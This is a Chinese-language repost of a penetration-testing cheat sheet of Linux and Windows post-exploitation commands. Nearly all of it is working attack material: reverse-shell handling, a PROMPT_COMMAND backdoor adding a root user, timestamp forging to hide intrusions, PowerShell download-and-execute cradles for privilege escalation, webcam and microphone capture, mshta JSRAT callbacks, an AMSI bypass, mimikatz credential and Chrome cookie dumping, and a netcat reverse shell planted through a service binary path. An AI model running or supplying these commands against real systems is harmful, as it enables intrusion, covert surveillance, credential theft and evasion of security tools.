Linux
Linux反弹shell后,方便的交互:
[sourcecode language=”plain”]python -c ‘import pty; pty.spawn("/bin/bash")'[/sourcecode]
无python时:
[sourcecode language=”plain”]expect -c ‘spawn bash;interact'[/sourcecode]
[sourcecode language=”plain”]exec 5<>/dev/tcp/sec-lab.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat<&5 > c.p[/sourcecode]
修改上传文件时间戳(掩盖入侵痕迹)
[sourcecode language=”plain”]touch -r 老文件时间戳 新文件时间戳[/sourcecode]
利用BASH提权
这个要求管理员有su的习惯,我们可以通过它来添加一个id=0的用户
PROMPTCOMMAND利用这个变量保存了在主提示符PROMPTCOMMAND利用这个变量保存了在主提示符PS1显示之前需要执行的命令
导入:
[sourcecode language=”plain”]export PROMPT_COMMAND=”/usr/sbin/useradd -o -u 0 hack &>/dev/null && echo hacker:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND”[/sourcecode]
lsof 命令
[sourcecode language=”plain”]
lsof 1.txt 显示开启文件 abc.txt 的进程
lsof -i :22 知道 22 端口现在运行什么程序
lsof -c nsd 显示 nsd 进程现在打开的文件
lsof -g gid 显示归属 gid 的进程情况
lsof +d /usr/local/ 显示目录下被进程开启的文件
lsof +D /usr/local/ 同上,但是会搜索目录下的目录,时间较长
lsof -d 4 显示使用 fd 为4 的进程
lsof -i [i] 用以显示符合条件的进程情况
[/sourcecode]
SSH端口转发
下面文章详细描述了3种方式转发
http://www.cnblogs.com/david-zhang-index/archive/2012/08/18/2645943.html
图片马
[sourcecode language=”plain”]Exiftool “-comment<=raj.php” 1.png[/sourcecode]
Windows
Powershell 相关
[sourcecode language=”plain”]powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Get-WLAN-Keys.ps1’);Get-Wlan-Keys "[/sourcecode]
提权加账号
[sourcecode language=”plain”]powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1’);Invoke-MS16-032 -Application cmd.exe -commandline ‘/c net user evi1cg test123 /add’"[/sourcecode]
下载执行:
[sourcecode language=”plain”]powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile(‘https://b.hiphotos.baidu.com/image/pic/item/d009b3de9c82d15825ffd75c840a19d8bd3e42da.jpg’,’C:\\Users\Public\\test.jpg’) & start C:\\Users\\Public\\test.jpg[/sourcecode]
摄像头录像:
[sourcecode language=”plain”]powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/xorrior/RandomPS-Scripts/master/MiniEye.ps1’); Capture-MiniEye -RecordTime 2 -Path $env:temp\hack.avi"[/sourcecode]
录音:
[sourcecode language=”plain”]powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-MicrophoneAudio.ps1’);Get-MicrophoneAudio -Path $env:TEMP\secret.wav -Length 10 -Alias ‘SECRET’"[/sourcecode]
MSHTA
VBSCRIPT EXEC
[sourcecode language=”plain”]mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)[/sourcecode]
JAVASCRIPT EXEC
[sourcecode language=”plain”]mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}[/sourcecode]
JSRAT
[sourcecode language=”plain”]mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.101:9998/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}[/sourcecode]
Bypass AMSI:
[sourcecode language=”plain”]PS C:\> [Ref].Assembly.GetType(‘System.Management.Automation.AmsiUtils’).GetField(‘amsiInitFailed’,’NonPublic,Static’).SetValue($null,$true)[/sourcecode]
use:
[sourcecode language=”plain”]powershell.exe -ExecutionPolicy Bypass -noprofile [Ref].Assembly.GetType(”System.Management.Automation.AmsiUtils”).GetField(”amsiInitFailed”,”NonPublic,Static”).SetValue($null,$true);iex(New-Object Net.WebClient).DownloadString(”http://192.168.230.1/msfpayload.ps1”)[/sourcecode]
Bypass AV
[sourcecode language=”plain”]
</pre><div class="line number1 index0 alt2"><code class="plain plain">sqlite3.exe -cmd "select load_extension(‘1.txt’,’EP’)"</code></div><div class="line number2 index1 alt1"><code class="plain plain">sqlite3.exe -cmd "select load_extension(‘\\192.168.1.101\share\1.txt’,’EP’)"</code>
[/sourcecode]
mimikatz
获取vpn密码
[sourcecode language=”plain”]mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit[/sourcecode]
读取chrome cookies
[sourcecode language=”plain”]
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\USERDA~1" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit [/sourcecode]
提权常用
// What system are we connected to?
[sourcecode language=”plain”]systeminfo | findstr /B /C:"OS Name" /C:"OS Version"[/sourcecode]
// Get the hostname and username (if available)
[sourcecode language=”plain”]
hostname
echo %username%
[/sourcecode]
// Get users
[sourcecode language=”plain”]
net users
net user [username]
[/sourcecode]
// Networking stuff
[sourcecode language=”plain”]ipconfig /all[/sourcecode]
// Printer?
[sourcecode language=”plain”]route print[/sourcecode]
// ARP-arific
[sourcecode language=”plain”]arp -A[/sourcecode]
// Active network connections
[sourcecode language=”plain”]netstat -ano[/sourcecode]
// Firewall fun (Win XP SP2+ only)
[sourcecode language=”plain”]
netsh firewall show state
netsh firewall show config
[/sourcecode]
// Scheduled tasks
[sourcecode language=”plain”]schtasks /query /fo LIST /v[/sourcecode]
// Running processes to started services
[sourcecode language=”plain”]
tasklist /SVC
net start
[/sourcecode]
// Driver madness
[sourcecode language=”plain”]DRIVERQUERY[/sourcecode]
// WMIC fun (Win 7/8 — XP requires admin)
[sourcecode language=”plain”]wmic /?[/sourcecode]
//Use wmic_info script!
// WMIC: check patch level
[sourcecode language=”plain”]wmic qfe get Caption,Description,HotFixID,InstalledOn[/sourcecode]
// Search pathces for given patch
[sourcecode language=”plain”]wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." [/sourcecode]
// AlwaysInstallElevated fun
[sourcecode language=”plain”]
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
[/sourcecode]
// Other commands to run to hopefully get what we need
[sourcecode language=”plain”]
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
[/sourcecode]
// Service permissions
[sourcecode language=”plain”]
sc query
sc qc [service_name]
[/sourcecode]
// Accesschk stuff download link
[sourcecode language=”plain”]
accesschk.exe /accepteula (always do this first!!!!!)
accesschk.exe -ucqv [service_name] (requires sysinternals accesschk!)
accesschk.exe -uwcqv "Authenticated Users" * (won’t yield anything on Win 8)
accesschk.exe -ucqv [service_name]
[/sourcecode]
// Find all weak folder permissions per drive.
[sourcecode language=”plain”]
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
[/sourcecode]
// Find all weak file permissions per drive.
[sourcecode language=”plain”]
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
[/sourcecode]
// Binary planting
[sourcecode language=”plain”]
sc config [service_name] binpath= "C:\nc.exe -nv [RHOST] [RPORT] -e C:\WINDOWS\System32\cmd.exe"
sc config [service_name] obj= ".\LocalSystem" password= ""
sc qc [service_name] (to verify!)
net start [service_name]
[/sourcecode]
CMD
[sourcecode language=”plain”]%ProgramData:~0,1%%ProgramData:~9,2% /c echo[/sourcecode]
命令行下载
[sourcecode language=”plain”]certutil -urlcache -split -f example.com/file[/sourcecode]
文章出处:Evi1cg’s blog
原文链接:https://evi1cg.me/archives/Commands.html
暂无评论内容